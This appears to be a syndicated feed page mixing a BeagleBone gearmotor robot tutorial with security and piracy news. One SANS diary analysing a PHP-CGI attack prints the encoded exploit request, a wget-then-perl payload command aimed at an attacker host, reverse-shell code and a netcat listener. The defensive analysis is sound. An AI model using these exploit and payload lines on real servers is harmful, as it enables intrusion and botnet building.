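For reference, a static lease like that is only a few lines in /etc/config/dhcp on an OpenWRT device such as the WR-703N. The hostname, MAC and IP below are placeholders rather than values from this build; after editing, restart dnsmasq (for example with /etc/init.d/dnsmasq restart) for the lease to take effect.

config host
        option name 'beaglebone'
        option mac  '00:11:22:33:44:55'
        option ip   '192.168.1.73'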

Controlling Gearmotors from the BeagleBone Black

Unlike the servo motors discussed in the previous article, gearmotors do not have a Pulse Width Modulation (PWM) control line that sets an angle to rotate to. There is only power and ground to connect. If you connect the gearmotor directly to a 12 V power source it will spin up to turn as fast as it can. To turn the gearmotor a little slower, say at 70 percent of its maximum speed, you need to supply power only 70 percent of the time. So we want to perform PWM on the power supply wire to the gearmotor. Unlike the PWM used to control a servo, we do not have any fixed 20 millisecond time slots forced on us. We can divide up time any way we want, for example running at full power for 0.7 seconds and then no power for 0.3 s, though a time slice much shorter than 1 s will produce smoother motion.
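
In Bonescript that whole idea collapses into a single analogWrite() call. The sketch below (the pin name is an arbitrary placeholder) runs one gearmotor at roughly 70 percent of full speed using a 2 kHz PWM signal, so each on/off slice is well under a millisecond and the motor sees a smooth average rather than visible pulsing.

var b = require('bonescript');

var MOTOR_PWM = 'P8_45';   // placeholder pin wired to the H-bridge enable input

// 0.7 = powered 70 percent of the time; 2000 Hz matches the frequency used
// by the setPWM() method later in this article.
b.analogWrite(MOTOR_PWM, 0.7, 2000);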

An H-Bridge chip is useful to be able to switch a high voltage, high current wire on and off from a 3.3 V wire connected to the BeagleBone Black. A single H-Bridge will let you control one gearmotor. Some chips like the L298 contain two H-Bridges. This is because two H-Bridges are useful if you want to control some stepper motors. A board containing an L298, heatsink and connection terminals can be had for as little as $5 from a China based shop, up to more than $30 for a fully populated configuration made in Canada that includes resistors to allow you to monitor the current being drawn by each motor.

The L298 has two pins to control the configuration of the H-Bridge and an enable pin. With the two control pins you can configure the H-Bridge to flow power through the motor in either direction. So you can turn the motor forwards and backwards depending on which of the two control pins is set high. When the enable pin is high then power flows from the motor batteries through the motor in the direction that the H-Bridge is configured for. The enable pin is where to use PWM in order to turn the motors at a rate slower than their top speed.

The two control lines and the enable line allow you to control one H-Bridge and thus one gearmotor. The L298 has a second set of enable and control lines so you can control a second gearmotor. Other than those lines the BeagleBone Black has to connect ground and 3.3 V to the H-Bridge.
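
Putting those three lines together, a small forward/reverse helper might look like the following sketch. The pin assignments are placeholders for a single H-bridge (the server code later in the article drives P8_37 to P8_40 for its two bridges), so adjust them to match your wiring.

var b = require('bonescript');

var IN1 = 'P8_37';   // H-bridge control pin A (placeholder wiring)
var IN2 = 'P8_39';   // H-bridge control pin B (placeholder wiring)
var EN  = 'P8_45';   // H-bridge enable pin, PWM capable (placeholder wiring)

b.pinMode(IN1, b.OUTPUT);
b.pinMode(IN2, b.OUTPUT);

// direction is 'forward' or 'reverse'; speed is a 0.0 - 1.0 duty cycle on the enable pin.
function drive(direction, speed) {
    b.digitalWrite(IN1, direction === 'forward' ? b.HIGH : b.LOW);
    b.digitalWrite(IN2, direction === 'forward' ? b.LOW : b.HIGH);
    b.analogWrite(EN, speed, 2000);
}

drive('forward', 0.7);   // spin the motor forwards at about 70 percent speed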

When I first tried to run the robot in a straight line I found that it gradually turned left. After some experimenting I found that at full power the left motor was rotating at a slightly slower RPM than the right one. I’m not sure where this difference was being introduced, but having found it early in testing, the software was designed to allow such calibration to be performed behind the scenes. You select 100 percent speed straight ahead and the software runs the right motor at only 97 percent power (or whatever calibration adjustment is currently applied).

To allow simple control of the two motors I used two concepts: the speed (0-100) and heading (0-100). A heading of 50 means that the robot should progress straight ahead. This mimics a car interface where steering (heading) and velocity are adjusted and the robot takes care of the details.

I have made the full source code available on github. Note the branch linux.com-article which is frozen in time at the point of the article. The master branch contains some new goodies and a few changes to the code structure, too.

The Server

Because the robot base was “T” shaped, over time it was referred to as TerryTee. The TerryTee nodejs class uses bonescript to control the PWM for the two gearmotors.

The constructor takes the pin identifiers to use for the left and right motor PWM signals and a reduction to apply to each motor, with 1.0 being no reduction and 0.95 meaning the motor runs at only 95 percent of the specified speed. The reduction is there so you can compensate if one motor runs slightly slower than the other.

function TerryTee( leftPWMpin, rightPWMpin, leftReduction, rightReduction )
{
    TerryTee.running = 1;
    TerryTee.leftPWMpin = leftPWMpin;
    TerryTee.rightPWMpin = rightPWMpin;
    TerryTee.leftReduction = leftReduction;
    TerryTee.rightReduction = rightReduction;
    TerryTee.speed = 0;
    TerryTee.heading = 50;
}

The setPWM() method shown below is the lowest level one in TerryTee, and the other methods use it to change the speed of each motor. The PWMpin argument selects which motor to control and ‘perc’ is the percentage of time that motor should be powered. I also allowed perc to be given either as 0-100 or as 0.0 – 1.0 so the web interface could deal in whole numbers.

When an emergency stop is active, running is false, so setPWM will not change the current signal. setPWM also applies the motor strength calibration automatically so higher level code doesn’t need to be concerned with that. As the analogWrite() Bonescript call uses the underlying PWM hardware to output the signal, the PWM does not need to be constantly refreshed from software; once you set 70 percent, the robot motor will continue to try to rotate at that speed until you tell it otherwise.

TerryTee.prototype.setPWM = function (PWMpin,perc) 
{
    if( !TerryTee.running )
	return;
    if( PWMpin == TerryTee.leftPWMpin ) {
	perc *= TerryTee.leftReduction;
    } else {
	perc *= TerryTee.rightReduction;
    }
    if( perc >  1 )   
	perc /= 100;
    console.log("awrite PWMpin:" + PWMpin + " perc:" + perc  );
    b.analogWrite( PWMpin, perc, 2000 );
};

The setSpeed() call takes the current heading into consideration and updates the PWM signal for each wheel to reflect the heading and speed you have currently set.

TerryTee.prototype.setSpeed = function ( v ) 
{
    if( !TerryTee.running )
	return;
    if( v < 40 )
    {
	TerryTee.speed = 0;
	this.setPWM( TerryTee.leftPWMpin,  0 );
	this.setPWM( TerryTee.rightPWMpin, 0 );
	return;
    }
    var leftv  = v;
    var rightv = v;
    var heading = TerryTee.heading;
    
    if( heading > 50 )
    {
	if( heading >= 95 )
	    leftv = 0;
	else
	    leftv *= 1 - (heading-50)/50;
    }
    if( heading < 50 )
    {
	if( heading <= 5 )
	    rightv = 0;
	else
	    rightv *= 1 - (50-heading)/50;
    }
    console.log("setSpeed v:" + v + " leftv:" + leftv + " rightv:" + rightv );
    this.setPWM( TerryTee.leftPWMpin,  leftv );
    this.setPWM( TerryTee.rightPWMpin, rightv );
    TerryTee.speed = v;
};

The server itself creates a TerryTee object and then offers a Web socket to control that Terry. The ‘stop’ message is intended as an emergency stop which forces Terry to stop moving and ignore input for a period of time so that you can get to it and disable the power in case something has gone wrong.

var terry = new TerryTee('P8_46', 'P8_45', 1.0, 0.97 );
terry.setSpeed( 0 );
terry.setHeading( 50 );
b.pinMode     ('P8_37', b.OUTPUT);
b.pinMode     ('P8_38', b.OUTPUT);
b.pinMode     ('P8_39', b.OUTPUT);
b.pinMode     ('P8_40', b.OUTPUT);
b.digitalWrite('P8_37', b.HIGH);
b.digitalWrite('P8_38', b.HIGH);
b.digitalWrite('P8_39', b.LOW);
b.digitalWrite('P8_40', b.LOW);
io.sockets.on('connection', function (socket) {
  ...
  socket.on('stop', function (v) {
      terry.setSpeed( 0 );
      terry.setHeading( 0 );
      terry.forceStop();
  });
  socket.on('speed', function (v) {
      console.log('set speed to ', v );
      console.log('set speed to ', v.value );
      if( typeof v.value === 'undefined')
	  return;
      terry.setSpeed( v.value );
  });
  ...

The code on github is likely to evolve over time to move the various fixed cutoff numbers to be configurable and allow Terry to be reversed from the tablet.

The Client (Web page)

To quickly create a Web interface I used Bootstrap and jQuery. If the interface became more advanced then perhaps something like AngularJS would be a better fit. To control the speed and heading with an easy touch interface I also used the bootstrap-slider project.

BeagleBone robot web interface

<div class="inner cover">
  <div class="row">
    <div class="col-md-1"><p class="lead">Speed</p></div>
    <div class="col-md-8"><input id="speed" data-slider-id='speedSlider' 
                    type="text" data-slider-min="0" data-slider-max="100" 
                    data-slider-step="1" data-slider-value="0"/></div>
  </div>
  <div class="row">
    <div class="col-md-1"><p class="lead">Heading</p></div>
    <div class="col-md-8"><input id="heading" data-slider-id='headingSlider' 
                    type="text" data-slider-min="0" data-slider-max="100" 
                    data-slider-step="1" data-slider-value="50"/></div>
  </div>
</div>
<div class="inner cover">
    <div class="btn-group">
	<button id="rotateleft" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-hand-left"></span>&nbsp;Rot&nbsp;Left</button>
	<button id="straightahead" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-arrow-up"></span>&nbsp;Straight&nbsp;ahead</button>
	<button id="rotateright" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-hand-right"></span>&nbsp;Rot&nbsp;Right</button>
    </div>
</div>

With those UI elements the hook up to the server is completed using io.connect() to connect a ‘var socket’ back to the BeagleBone Black. The below code sends commands back to the BeagleBone Black as UI elements are adjusted on the page. The rotateleft command is simulated by setting the heading and speed for a few seconds and then stopping everything.

$("#speed").on('slide', function(slideEvt) {
    socket.emit('speed', {
        value: slideEvt.value[0],
        '/end': 'of-message'
    });
});
...
$('#straightahead').on('click', function (e) {
     $('#heading').data('slider').setValue(50);
})
$('#rotateleft').on('click', function (e) {
     $('#heading').data('slider').setValue(0);
     $('#speed').data('slider').setValue(70);
     setTimeout(function() {
        $('#speed').data('slider').setValue(0);
        $('#heading').data('slider').setValue(50);
     }, 2000);
})

The BeagleBone Black runs a Web server offering files from /usr/share/bone101. I found it convenient to put the whole project in /home/xuser/webapps/terry-tee and create a softlink to the project at /usr/share/bone101/terry-tee. This way http://mybeagleip/terry-tee/index.html will load the Web interface on a tablet. Cloud9 will automatically start any Bonescript files contained in /var/lib/cloud9/autorun. So two links set up Cloud9 to both serve the client and automatically start the server Bonescript for you:

root@beaglebone:/var/lib/cloud9/autorun# ls -l
lrwxrwxrwx 1 root root 39 Apr 23 07:02 terry.js -> /home/xuser/webapps/terry-tee/server.js
root@beaglebone:/var/lib/cloud9/autorun# cd /usr/share/bone101/
root@beaglebone:/usr/share/bone101# ls -l terry-tee
lrwxrwxrwx 1 root root 29 Apr 17 05:48 terry-tee -> /home/xuser/webapps/terry-tee

Wrap up

I originally tried to use the GPIO pins P8_41 to 44. I found that if I had wires connected to those ports the BeagleBone Black would not start. I could remove and reapply the wires after startup and things would function as expected. On the other hand, leaving 41-44 unconnected and using 37-40 instead, the BeagleBone Black would boot up fine. If you have a problem starting your BeagleBone Black you might be accidentally using a pin that has a reserved function during startup.

While the configuration shown in this article only allows control of the robot base’s movement, the same code could easily be extended to control other aspects of the robot you are building – for example, an attached arm, so you could move things around from your tablet.

Using a BeagleBone Black to control the robot base gives the robot plenty of CPU performance. This opens the door to using a mounted camera with OpenCV to implement object tracking. For example, the robot can move itself around in order to keep facing you. While the configuration in this article used wifi to connect with the robot, another interesting possibility is to use 3G to connect to a robot that isn’t physically nearby.

The BeagleBone Black can create a great Web-controlled robot and the 3 wheel robot base together with some gearmotors should get you moving fairly easily. Though once you have the base moving around you may find it difficult to resist giving your robot more capabilities!

We would like to thank ServoCity for supplying the 3 wheel robot base, gearmotors, gearbox and servo used in this article.

TorrentFreak: No VPN on Earth Can Protect Careless Pirates

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

pirate-cardLast year, Philip Danks, a man from the West Midlands, UK, went into a local cinema and managed to record the movie Fast and Furious 6. He later uploaded that content to the Internet.

After pleading guilty, this week Wolverhampton Crown Court sentenced him to an unprecedented 33 months in prison.

The Federation Against Copyright Theft are no doubt extremely pleased with this result. After their successful private prosecution, the Hollywood-affiliated anti-piracy group is now able to place Danks’ head on a metaphorical pike, a clear warning to other would-be cammers. But just how difficult was this operation?

There’s often a lot of mystery attached to the investigations process in a case like this. How are individuals like Danks tracked and found? Have FACT placed spies deep into file-sharing sites? Are the authorities sniffing traffic and breaking pirates’ VPN encryption?

Or are they spending half an hour with Google and getting most of it handed to them on a plate? In Danks’ case, that appears to be exactly what happened.

Something that many millions of people use online is a nickname, and Danks was no exception. His online alias in the torrenting scene was TheCod3r, and as shown below it is clearly visible in the release title.

Kick-up

The idea behind aliases is that they provide a way to mask a real name. Military uses aside, adopting an alternative communications identity was something popularized in the 70s with the advent of Citizens Band radio. The practice continues online today, with many people forced to adopt one to register with various services.

However, what many in the file-sharing scene forget is that while aliases on a torrent site might be useful, they become as identifying as a real name when used elsewhere in ‘regular’ life. The screenshot below shows one of Danks’ first huge mistakes.

Fish-Google

Clicking that link on dating site Plenty of Fish (POF) reveals a whole range of information about a person who, at the very least, uses the same online nickname as Danks. There’s no conclusive proof that it’s the same person, but several pieces of information begin to build a picture.

In his POF profile, Danks reveals his city as being Willenhall, a small town situated in an area known locally as the Black Country. What FACT would’ve known soon after the movie leaked online was which cinema it had been recorded in. That turned out to be a Showcase cinema, just a few minutes up the road from Willenhall in the town of Walsall.

Also revealed on Danks’ POF profile is his full name and age. When you have that, plus a town, you can often find a person’s address on the UK’s Electoral Register.

It’s also trivial to find social networking pages. Not only do pictures on Danks’ POF profile match those on his Facebook page, he also has a revealing movie item listed in his interests section.

fb-1

Of course, none of this in itself is enough to build a decent case, but when you have the police on board as FACT did, things can be sped up somewhat. On May 23, 2013 Danks was raided and then, just two days later, he did something quite astonishing.

The then 24-year-old took to one of his two Facebook accounts to mock the makers of Fast and Furious 6.

“Seven billion people and I was the first. F*** you Universal Pictures,” he wrote.

Also amazing was Danks’ apparent disregard for the predicament he was in. On May 10, 2013, Danks again took to Facebook, this time to advertise that he was selling copies of movies including Robocop and Captain America.

sale

This continued distribution of copyrighted material particularly aggravated the Court at his sentencing hearing this week, with Danks’ behavior being described as “bold, arrogant and cocksure offending.”

While the list of events above clearly shows a catalog of errors that some might even find amusing, the habit of reusing the same nickname across many sites is widespread, even among some of the biggest names in the game.

Once these and other similar indicators migrate across into real-life identities and activities (and the ever-present Facebook account of course), joining the dots is not difficult – especially for the police and outfits like FACT. And once that happens, no amount of VPN encryption or lack of logging is going to put the genie back in the bottle.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: Disguising Exfiltrated Data

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s an interesting article on a data exfiltration technique.

What was unique about the attackers was how they disguised traffic between the malware and command-and-control servers using Google Developers and the public Domain Name System (DNS) service of Hurricane Electric, based in Fremont, Calif.

In both cases, the services were used as a kind of switching station to redirect traffic that appeared to be headed toward legitimate domains, such as adobe.com, update.adobe.com, and outlook.com.

[...]

The malware disguised its traffic by including forged HTTP headers of legitimate domains. FireEye identified 21 legitimate domain names used by the attackers.

In addition, the attackers signed the Kaba malware with a legitimate certificate from a group listed as the “Police Mutual Aid Association” and with an expired certificate from an organization called “MOCOMSYS INC.”

In the case of Google Developers, the attackers used the service to host code that decoded the malware traffic to determine the IP address of the real destination and redirect the traffic to that location.

Google Developers, formerly called Google Code, is the search engine’s website for software development tools, APIs, and documentation on working with Google developer products. Developers can also use the site to share code.

With Hurricane Electric, the attacker took advantage of the fact that its domain name servers were configured so that anyone could register for a free account with the company’s hosted DNS service.

The service allowed anyone to register a DNS zone, which is a distinct, contiguous portion of the domain name space in the DNS. The registrant could then create A records for the zone and point them to any IP address.

Honestly, this looks like a government exfiltration technique, although it could be evidence that the criminals are getting even more sophisticated.

LWN.net: Linux Kernel Git Repositories Add 2-Factor Authentication (Linux.com)

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Linux.com takes a look at using 2-factor authentication for commit access to kernel git repositories. “Having the technology available is one thing, but how to incorporate it into the kernel development process — in a way that doesn’t make developers’ lives painful and unbearable? When we asked them, it became abundantly clear that nobody wanted to type in 6-digit codes every time they needed to do a git remote operation. Where do you draw the line between security and usability in this case?

We looked at the options available in gitolite, the git repository management solution used at kernel.org, and found a way that allowed us to trigger additional checks only when someone performed a write operation, such as “git push.” Since we already knew the username and the remote IP address of the developer attempting to perform a write operation, we put together a verification tool that allowed developers to temporarily whitelist their IP addresses using their 2-factor authentication token.”

SANS Internet Storm Center, InfoCON: green: Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that with no port forwarding enabled through the firewall that Internet originated NTP requests were getting past the firewall to the misconfigured NTP server?

The reason why these packets are passing the firewall is because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled the firewall would treat outbound UDP transactions as I described earlier.  When a device on your network initiates an outbound connection to a server responses from that server are permitted back into your network.  Since UDP is stateless most firewalls simulate state with a timeout.  In other words if no traffic is seen between the device and the server for 600 seconds then don’t permit any response from the server until there is new outbound traffic. But anytime related traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate. Visually that looks like:

However if UDP Session Control is disabled, as it is in this device, then this device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem since the only port exposed is the original ephemeral source port and it is waiting for an NTP reply.  It is not likely to be used as an NTP reflector.  But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric NTP in which, instead of the originating device picking an ephemeral port for the outbound connection,  both the source and the destination ports use 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server to be an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed the replies will not go back to the attacker, but will go to a victim instead. 

Of course UDP is stateless so the source IP can be spoofed and there is no way for the receiver of the NTP request to validate the source IP or source port, permitting the attacker to direct the attack against any IP and port on the Internet. It is exceedingly difficult to trace these attacks back to the source, so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of the attackers holding these communications open for months.

What are the lessons to be learned here:

  • If all ISPs fully implemented anti-spoofing filters then the likelihood of this sort of attack is lowered substantially.  In a nutshell anti-spoofing says that if the traffic is headed into my network and the source IP address is from my network then the source IP must be spoofed, so drop the packet.  It also works in the converse.  If a packet is leaving my network and the source IP address is not an IP address from my network then the source IP address must be spoofed, so drop the packet.
  • It can’t hurt to check your network for NTP servers. A single nmap command will quickly confirm if any are open on your network: nmap -sU -A -n -PN -pU:123 --script=ntp-monlist . If you find one or more, perhaps you can contact the vendor for possible resolution. A minimal Node.js reachability check is also sketched after this list.
  • If you own a gateway router that implements full-cone NAT you may want to see if your gateway router implements the equivalent of the Pace “Strict UDP Session Control”. This will prevent an attacker from accessing misconfigured UDP servers on your network.
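
For those who prefer to script the check, the sketch below sends a single standard NTP client query from Node.js and reports whether anything answers on UDP port 123. It is only a reachability test (the default target address is a placeholder), not a substitute for the nmap monlist scan mentioned above.

var dgram = require('dgram');

var target = process.argv[2] || '192.168.1.1';   // host to test; placeholder default
var socket = dgram.createSocket('udp4');
var packet = Buffer.alloc(48);
packet[0] = 0x1b;                                // LI=0, VN=3, Mode=3 (client query)

var timer = setTimeout(function () {
    console.log('No NTP reply from ' + target);
    socket.close();
}, 3000);

socket.on('message', function (msg, rinfo) {
    clearTimeout(timer);
    console.log(rinfo.address + ' answered on UDP/123 - an NTP service is reachable');
    socket.close();
});

socket.send(packet, 0, packet.length, 123, target);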

– Rick Wanner – rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: Web Server Attack Investigation – Installing a Bot and Reverse Shell via a PHP Vulnerability, (Sat, Aug 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With Windows malware getting so much attention nowadays, it’s easy to forget that attackers also target other OS platforms. Let’s take a look at a recent attempt to install an IRC bot written in Perl by exploiting a vulnerability in PHP.

The Initial Probe

The web server received the initial probe from 46.41.128.231, an IP address that at the time was not flagged as malicious on various blacklists:

HEAD / HTTP/1.0

The connection lacked the headers typically present in an HTTP request, which is why the web server’s firewall blocked it with a 403 Forbidden HTTP status code. However, that response was sufficient for the attacker’s tool to confirm that it had located a web server.

The Exploitation Attempt

The offending IP address initiated another connection to the web server approximately 4 hours later. This time, the request was less gentle than the initial probe:

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded

As shown above, the attacking system attempted to access /cgi-bin/php on the targeted server. The parameter supplied to /cgi-bin/php, when converted from hexadecimal into ASCII, corresponded to this:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
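
The conversion is easy to reproduce. In Node.js, for example, swapping the '+' signs for spaces and percent-decoding the query string (shortened here to its first and last switches; substitute the full string from the request) recovers the plaintext:

// URL encoding uses '+' for spaces, so swap those before percent-decoding.
var encoded = '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6E';
var decoded = decodeURIComponent(encoded.replace(/\+/g, ' '));
console.log(decoded);   // prints: -d allow_url_include=on -n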

These parameters, when supplied to a vulnerable version of /cgi-bin/php, are designed to dramatically reduce security of the PHP configuration on the system. We covered a similar pattern in our 2012 diary when describing the CVE-2012-1823 vulnerability in PHP. The fix to that vulnerability was poorly implemented, which resulted in the CVE-2012-2311 vulnerability that affected “PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script,” according to MITRE. The ISS advisory noted that,

“PHP could allow a remote attacker to execute arbitrary code on the system, due to an incomplete fix for an error related to parsing PHP CGI configurations. An attacker could exploit this vulnerability to execute arbitrary code on the system.”

SpiderLabs documented a similar exploitation attempt in 2013, where they clarified that “one of the key modifications is to specify ‘auto_prepend_file=php://input‘ which will allow the attacker to send PHP code in the request body.”

The Exploit’s Primary Payload: Downloading a Bot

With the expectation that the initial part of the malicious POST request reconfigured PHP, the body of the request began with the following code:

<?php system("wget ip-address-redacted/speedtest/.a/hb/phpR05 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7 &"); ?>

If the exploit was successful, code would direct the targeted server to download /.a/hb/phpR05 from the attacker’s server, saving the file as /tmp/.bash_h1s7, then running the file using Perl and then deleting the file. Searching the web for “phpR05″ showed a file with this name being used in various exploitation attempts. One such example was very similar to the incident being described in this diary. (In a strange coincidence, that PHP attack was visible in the data that the server was leaking due to a Heartbleed vulnerability!)

The malicious Perl script was an IRC bot, and was recognized as such by several antivirus tools according to VirusTotal. Here’s a tiny excerpt from its code:

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Rizee|RYN|05|".int(rand(8999)+1000);
}

This bot was very similar to the one described by James Espinosa in 2013 in an article discussing Perl/ShellBot.B trojan activity, which began with attempts to exploit a phpMyAdmin file inclusion vulnerability.

The Exploit’s Secondary Payload: Reverse Shell

In addition to supplying instructions to download the IRC bot, the malicious POST request contained PHP code that implemented a reverse backdoor, directing the targeted web server to establish a connection to the attacker’s server on TCP port 22. That script began like this:

$ip = 'ip-address-redacted';
$port = 22;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';

Though the attacker specified port 22, the reverse shell didn’t use SSH. Instead, it expected the attacker’s server to listen on that port using a simple tool such as Netcat. Experimenting with this script and Netcat in a lab environment confirmed this, as shown in the following screenshot:

In this laboratory experiment, ‘nc -l -p 22‘ directed Netcat to listen for connections on TCP port 22. Once the reverse shell script ran on the system that mimicked the compromised server, the simulated attacker had the ability to run commands on that server (e.g., ‘whoami‘).

Interestingly, the production server’s logs showed that the system in the wild was listening on TCP port 22; however, it was actually running SSH there, so the reverse shell connection established by the malicious PHP script would have failed.

A bit of web searching revealed a script called ap-unlock-v1337.py, reportedly written in 2012 by “noptrix,” which was designed to exploit the PHP vulnerability outlined above. That script included the exact exploit code used in this incident and included the code that implemented the PHP-based reverse shell. The attacker probably used that script with the goal of installing the Perl-based IRC bot, ignoring the reverse shell feature of the exploit.

Wrap Up

The attack, probably implemented using an automated script that probed random IP addresses, was designed to build an IRC-based bot network. It targeted Unix systems that ran a version of PHP susceptible to a 2-year-old vulnerability. This recent incident suggests that there are still plenty of unpatched systems left to compromise. The attacker used an off-the-shelf exploit and an unrelated off-the-shelf bot, both of which were readily available on the Internet. The attacker’s infrastructure included 3 different IP addresses, none of which were blacklisted at the time of the incident.

– Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers’ IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and . He also writes a security blog, where he recently described other attacks observed on a web server.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: TalkTalk Wants Resellers to Warn Pirating Customers

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

talktalklogoUnlike those in the US, Internet providers in the UK are not obliged to forward copyright infringement notices to their subscribers. This means that local Internet users are spared the typical warnings that are so common elsewhere.

Despite the lack of a legal requirement, some anti-piracy groups do send copyright infringement notices to UK ISPs. In most cases these are ignored by the providers, but last week TalkTalk forwarded a notice to one of its resellers.

In the email the ISP asks Opal Solutions to forward the notice in question to one of its subscribers who allegedly shared a pirated copy of “Godzilla”. In addition the reseller was urged to take “preventive” measures, but what these should be is left open.

“Please see below copyright infringement email regarding an IP address of one of your clients, Please inform your client and take necessary preventative measures,” TalkTalk wrote.

At the bottom of this article is a copy of the original copyright infringement notice TalkTalk forwarded. It is a typical DMCA style notice sent by IP Echelon on behalf of Warner Bros.

IP Echelon didn’t make any effort to customize the notice for the UK audience. The email specifically references US copyright law, which doesn’t apply to the reseller or TalkTalk.

What’s most noteworthy, though, is that TalkTalk has decided to pass on this notice. The ISP is not known to forward these notices to its own subscribers, yet they appear to be urging a reseller to go beyond what’s required by law.

The forwarded email is most likely an attempt to avoid any type of liability. The question that remains is this: if TalkTalk do this with resellers does this mean they will start warning their subscribers as well?

Earlier this year the news broke that TalkTalk and other UK providers will voluntarily start sending infringement notices under the VCAP program. While VCAP isn’t going into effect before the summer of 2015, TalkTalk’s forwarded infringement notice could suggest that they might do something sooner.

Below is a full copy of the copyright infringement notice.

—-

We are writing this message on behalf of Warner Bros. Entertainment Inc..

We have received information that an individual has utilized the
below-referenced IP address at the noted date and time to offer
downloads of copyrighted material.

The title in question is: Godzilla

The distribution of unauthorized copies of copyrighted television
programs constitutes copyright infringement under the Copyright Act,
Title 17 United States Code Section 106(3). This conduct may also
violate the laws of other countries, international law, and/or treaty
obligations.

Since you own this IP address
we request that you immediately do the following:

1) Contact the subscriber who has engaged in the conduct described
above and take steps to prevent the subscriber from further downloading
or uploading Warner Bros. Entertainment Inc. content without authorization; and

2) Take appropriate action against the account holder under your Abuse
Policy/Terms of Service Agreement.

On behalf of Warner Bros. Entertainment Inc., owner of the exclusive rights
in the copyrighted material at issue in this notice, we hereby state that
we have a good faith belief that use of the material in the manner
complained of is not authorized by Warner Bros. Entertainment Inc.,
its respective agents, or the law.

Also, we hereby state, under penalty of perjury, that we are authorized
to act on behalf of the owner of the exclusive rights being infringed
as set forth in this notification.

We appreciate your assistance and thank you for your cooperation in this
matter. Your prompt response is requested.

Any further enquiries can be directed to copyright@ip-echelon.com
Please include this message with your enquiry to ensure a swift response.

Respectfully,

Adrian Leatherland
CEO
IP-Echelon
Email: copyright@ip-echelon.com
Address: 6715 Hollywood Blvd, Los Angeles, 90028, United States

- ————- Infringement Details ———————————-
Title: Godzilla
Timestamp: 2014-08-13T14:06:26Z
IP Address:
Port: 60261
Type: BitTorrent
Torrent Hash: c5cdf551eea353484657d45dbe93f688575a1e31
Filename: Godzilla.2014.WEBRiP.XviD-VAiN
Filesize: 2485 MB
- ———————————————————————

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Something is amiss with the Interwebs! BGP is a flapping. , (Tue, Aug 12th)

